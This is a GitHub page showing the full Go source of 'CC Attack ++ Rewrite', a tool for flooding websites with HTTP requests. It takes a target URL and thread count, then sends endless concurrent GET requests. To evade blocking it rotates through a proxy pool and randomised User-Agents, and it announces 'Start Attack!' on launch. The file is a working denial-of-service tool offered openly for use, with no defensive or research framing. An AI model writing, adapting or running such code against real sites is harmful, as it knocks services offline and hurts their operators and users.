-
Notifications
You must be signed in to change notification settings - Fork 6
/
CC-Attack-Rewrite-2.0.0.go
190 lines (151 loc) · 4.27 KB
/
CC-Attack-Rewrite-2.0.0.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
// Name : CC Attack ++ Rewrite
// Author : MasonDye
// Version : 2.0.0
// GitHub : https://github.com/MasonDye/CC-Attack-Rewrite
package main
import (
"bufio"
"flag"
"fmt"
"net/http"
"os"
"strings"
"sync"
"time"
"net/url"
"math/rand"
)
var version = "2.0.0 (BUILD 2023/11/15 12:00)"
func main() {
targetURL := flag.String("url", "", "Attack URL")
requestInterval := flag.Int("time", 100, "Attack Speed(ms)")
userAgentFile := flag.String("ua", "", "User-Agent Config Path (txt)")
proxyListFile := flag.String("ip", "", "IP Pool Path (txt)")
threadCount := flag.Int("thread", 2, "thread")
flag.Parse()
if *targetURL == "" {
fmt.Println("Usage:")
flag.PrintDefaults()
return
}
var proxyList []string
if *proxyListFile != "" {
var err error
proxyList, err = readProxyList(*proxyListFile)
if err != nil {
fmt.Println("Failed to read IP Pool file:", err)
return
}
}
userAgent := "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
if *userAgentFile != "" {
userAgentList, err := readUserAgentList(*userAgentFile)
if err != nil {
fmt.Println("Failed to read User-Agent file:", err)
return
}
userAgent = getRandomUserAgent(userAgentList)
}
client := &http.Client{}
successCount := 0
var wg sync.WaitGroup
// Wellcome and version
fmt.Println("\033[32mCC Attack ++ \033[31m|\033[34m Version:",version,"\033[0m")
// Print attack start
fmt.Println("\033[31mStart Attack!\033[0m")
proxyIndex := 0 // Proxy Index
proxyCount := len(proxyList) // Proxy Count
for i := 0; i < *threadCount; i++ {
wg.Add(1)
go func() {
defer wg.Done()
for {
if proxyCount > 0 { // If proxy available
proxyURL := getProxyFromList(proxyList, proxyIndex)
transport := &http.Transport{
Proxy: http.ProxyURL(proxyURL),
}
client.Transport = transport
proxyIndex = (proxyIndex + 1) % proxyCount // Incrementing indexes and fetching modes to implement round-robin use of proxies
} else {
client.Transport = nil // No proxy, direct
}
go func() {
req, err := http.NewRequest("GET", *targetURL, nil)
if err != nil {
fmt.Println("Request creation failed:", err)
return
}
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
fmt.Println("Request failed to send:", err)
return
}
successCount++
// Print attack info
fmt.Printf("\033[31mRequested:%d \033[0m|\033[31m URL:%s \033[0m|\033[31m Thread:%d \033[0m|\033[31m Time:%d \033[0m\n", successCount, *targetURL, *threadCount, *requestInterval)
resp.Body.Close()
}()
time.Sleep(time.Duration(*requestInterval) * time.Millisecond)
}
}()
}
wg.Wait()
}
func readProxyList(filename string) ([]string, error) {
file, err := os.Open(filename)
if err != nil {
return nil, err
}
defer file.Close()
var proxyList []string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
proxy := strings.TrimSpace(scanner.Text())
proxyList = append(proxyList, proxy)
}
if err := scanner.Err(); err != nil {
return nil, err
}
return proxyList, nil
}
func readUserAgentList(filename string) ([]string, error) {
file, err := os.Open(filename)
if err != nil {
return nil, err
}
defer file.Close()
var userAgentList []string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
userAgent := strings.TrimSpace(scanner.Text())
userAgentList = append(userAgentList, userAgent)
}
if err := scanner.Err(); err != nil {
return nil, err
}
return userAgentList, nil
}
func getRandomProxy(proxyList []string) *url.URL {
if len(proxyList) == 0 {
return nil
}
randIndex := rand.Intn(len(proxyList))
proxyURL, _ := url.Parse(proxyList[randIndex])
return proxyURL
}
func getProxyFromList(proxyList []string, index int) *url.URL {
if len(proxyList) == 0 {
return nil
}
proxyURL, _ := url.Parse(proxyList[index])
return proxyURL
}
func getRandomUserAgent(userAgentList []string) string {
if len(userAgentList) == 0 {
return ""
}
randIndex := rand.Intn(len(userAgentList))
return userAgentList[randIndex]
}